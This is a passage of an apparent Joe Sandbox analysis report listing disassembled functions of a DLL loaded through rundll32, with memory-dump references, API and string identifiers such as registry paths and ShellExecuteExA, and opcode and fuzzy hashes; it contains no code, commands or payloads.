                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ConditionErrorFreeInfoLastLocalMaskVerifyVersion
                                                                                                                                  • String ID: Advapi32.dll$CurrentBuildNumber$RegCloseKey$RegOpenKeyExW$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                  • API String ID: 1705557312-2525593150
                                                                                                                                  • Opcode ID: d838daccb81d71d35b80107858d774af3e5616e532a7525f8534e3fbf145c2ea
                                                                                                                                  • Instruction ID: b0da0ae4477df4ac1bfd5b332b39290ce3a3f5af486fa48fd2cb83da637c0e73
                                                                                                                                  • Opcode Fuzzy Hash: d838daccb81d71d35b80107858d774af3e5616e532a7525f8534e3fbf145c2ea
                                                                                                                                  • Instruction Fuzzy Hash: 3D515C35B08B8285FB30CF95E8A46B563A8FB48B91F450239DA4E97B94DF7DE405D700
                                                                                                                                  Function 00007FFD92DB7F70 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 115libraryloadermemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorLastLocalProc$AllocConditionFreeInfoMaskVerifyVersion
                                                                                                                                  • String ID: $SYSTEM\CurrentControlSet\Control\Class\$SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                                                                                  • API String ID: 2783935822-2686055259
                                                                                                                                  • Opcode ID: 2c65741bb2e4e7683c67e8ef166769608d7f6bf1b8df71c7b07c1739b7130ba0
                                                                                                                                  • Instruction ID: 29007459ee37f0ab47806c10e89a4992bc45777be24f1f8927f63ac90e76cd1a
                                                                                                                                  • Opcode Fuzzy Hash: 2c65741bb2e4e7683c67e8ef166769608d7f6bf1b8df71c7b07c1739b7130ba0
                                                                                                                                  • Instruction Fuzzy Hash: 1A517C32B09B4282FB70CF95B4A426A63E8BB58B81F450139EA4E93B54EF7DE4058704
                                                                                                                                  Function 00007FFD92DB5240 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 108libraryloadermemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorLastLocalProc$AllocConditionFreeInfoMaskVerifyVersion
                                                                                                                                  • String ID: $SYSTEM\CurrentControlSet\Control\Class\$SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                                                                                  • API String ID: 2783935822-2686055259
                                                                                                                                  • Opcode ID: 6c6a4e8a0bcc7c5af865d58409ceb37ef023d90e6961c4f2e9d2de8a1adc6423
                                                                                                                                  • Instruction ID: 9188445de4f6b5191c0efa3662cf6422a0b971f3013e1ccb8fffef67d5ec341f
                                                                                                                                  • Opcode Fuzzy Hash: 6c6a4e8a0bcc7c5af865d58409ceb37ef023d90e6961c4f2e9d2de8a1adc6423
                                                                                                                                  • Instruction Fuzzy Hash: 2E514032B09B8282FB70DF95F4A426A63A8FB88781F440139DA8D93B54EF7DE415D704
                                                                                                                                  Function 00007FFD92DB8830 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFreeLastLocal
                                                                                                                                  • String ID: Shell32.dll$ShellExecuteExA
                                                                                                                                  • API String ID: 3928016487-2609298245
                                                                                                                                  • Opcode ID: 6847e5a35347b6cc4f56585a02c2dcd8631616a208d8b4f60e6902eac1570615
                                                                                                                                  • Instruction ID: 0e698585bd5224a0b05dcef9cea66547c5f25f0e4a48ce32be7264ee0f4133be
                                                                                                                                  • Opcode Fuzzy Hash: 6847e5a35347b6cc4f56585a02c2dcd8631616a208d8b4f60e6902eac1570615
                                                                                                                                  • Instruction Fuzzy Hash: 4D318D61B09B4282FE749FE2B9B423963A5AF89BD1F08453CDD0E57B51EE6DE0109300
                                                                                                                                  Function 00007FFD92DB5A80 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 80registrymemorythreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Console$ProcessWindow$AllocCloseCurrentOpenQueryThreadTitleValue
                                                                                                                                  • String ID: LogLevel$NGX$SOFTWARE\NVIDIA Corporation\Global\NGXCore
                                                                                                                                  • API String ID: 813702208-1451484610
                                                                                                                                  • Opcode ID: 50fab19680d1afe733d3e66660d2e70778c793c35c9ee94b78459fe8881ff264
                                                                                                                                  • Instruction ID: 0a4209908836595ad4e0105071d6a336a5fa5bad4209ea387d9a88a1c5ae9cf0
                                                                                                                                  • Opcode Fuzzy Hash: 50fab19680d1afe733d3e66660d2e70778c793c35c9ee94b78459fe8881ff264
                                                                                                                                  • Instruction Fuzzy Hash: 00413635B09A8286EB349F95F8A426AB3A8FF84795F400139DA4D53B78DFACE054D700
                                                                                                                                  Function 00000001800368B0 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4099253644-0
                                                                                                                                  • Opcode ID: c236f47fa00f1eb095f464021b61fc5b1928e1c18c896dc44bc4746b0c097f4e
                                                                                                                                  • Instruction ID: e2653a9f16c68cd9db8ac6c19f3406fb9b710f8bb8de90df47967776b1696018
                                                                                                                                  • Opcode Fuzzy Hash: c236f47fa00f1eb095f464021b61fc5b1928e1c18c896dc44bc4746b0c097f4e
                                                                                                                                  • Instruction Fuzzy Hash: 6B314E31601A4C89FED7DB11E9613E563A0BB4D7D4F19C226BA190AAE5DFBCC68D8301
                                                                                                                                  Function 00007FFD92EE0EB0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 108librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$AllocDirectoryFreeSystem$AddressErrorLastLibraryLoadProc
                                                                                                                                  • String ID: Advapi32.dll$RegQueryValueExW$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                  • API String ID: 3758263020-1610639660
                                                                                                                                  • Opcode ID: cbde8d636b6884e0b5bdf4ee94e9aa60a5168ff0c590a648ea3f7d8721b2ee0d
                                                                                                                                  • Instruction ID: 2445478ea54494ed38c560e7650135221c0f34c91a4f53927b013bb2030d6118
                                                                                                                                  • Opcode Fuzzy Hash: cbde8d636b6884e0b5bdf4ee94e9aa60a5168ff0c590a648ea3f7d8721b2ee0d
                                                                                                                                  • Instruction Fuzzy Hash: 3F417025B09B8282FA708F92B9A462AB3A4FF48BD5F440038ED4D67754DF7DE814DB00
                                                                                                                                  Function 00007FFD92DC5A60 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFreeLastLocal
                                                                                                                                  • String ID: Shell32.dll$ShellExecuteExA
                                                                                                                                  • API String ID: 3928016487-2609298245
                                                                                                                                  • Opcode ID: 2e57f5782fe3bf08634fd71a5693bd78e2723d414804ef75c094206830ef4e48
                                                                                                                                  • Instruction ID: 623391d0dbc7418e47395d422e35b3c1fde3a778c06db922342a844491729e9d
                                                                                                                                  • Opcode Fuzzy Hash: 2e57f5782fe3bf08634fd71a5693bd78e2723d414804ef75c094206830ef4e48
                                                                                                                                  • Instruction Fuzzy Hash: AD217165B0DB4281FE78DFE2B9B01392294BF48BC1F044538D94E97F55DE6DE4509310
                                                                                                                                  Function 00007FFD92EE1990 Relevance: 15.1, APIs: 12, Instructions: 106memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Local$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 916652521-0
                                                                                                                                  • Opcode ID: 7233dbdddb0dc7e43d53d00e7812c2ac2f0c79c21a3cd17f9c0fc5ae811c0866
                                                                                                                                  • Instruction ID: 6cee5bf4e68306e2a2f2027f34435784d6256106f9f73493ec93f7c27da9eb69
                                                                                                                                  • Opcode Fuzzy Hash: 7233dbdddb0dc7e43d53d00e7812c2ac2f0c79c21a3cd17f9c0fc5ae811c0866
                                                                                                                                  • Instruction Fuzzy Hash: 6241C351B0C74242FF755FD2A5B43796295AF49BE1F044138DD0E5BB91EEBDE8818310
                                                                                                                                  Function 00007FFD92DC36C0 Relevance: 15.1, APIs: 10, Instructions: 105filelibraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FileLocal$AllocAttributesCloseCreateFreeHandleLibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 655590559-0
                                                                                                                                  • Opcode ID: 7468935337419462e1a44ad935823fa4f650fd4723db35e1c35ea56460038761
                                                                                                                                  • Instruction ID: 47d9aaf48cd022a9a7df85a5348361dd75b802fe316747e4b3768236ae00650c
                                                                                                                                  • Opcode Fuzzy Hash: 7468935337419462e1a44ad935823fa4f650fd4723db35e1c35ea56460038761
                                                                                                                                  • Instruction Fuzzy Hash: D241FF69F4C74286FB785BA2A5A023966D1EF44BD2F44433CEE4E06ED0CF7DE8528640
                                                                                                                                  Function 00000001800012F0 Relevance: 15.1, APIs: 10, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
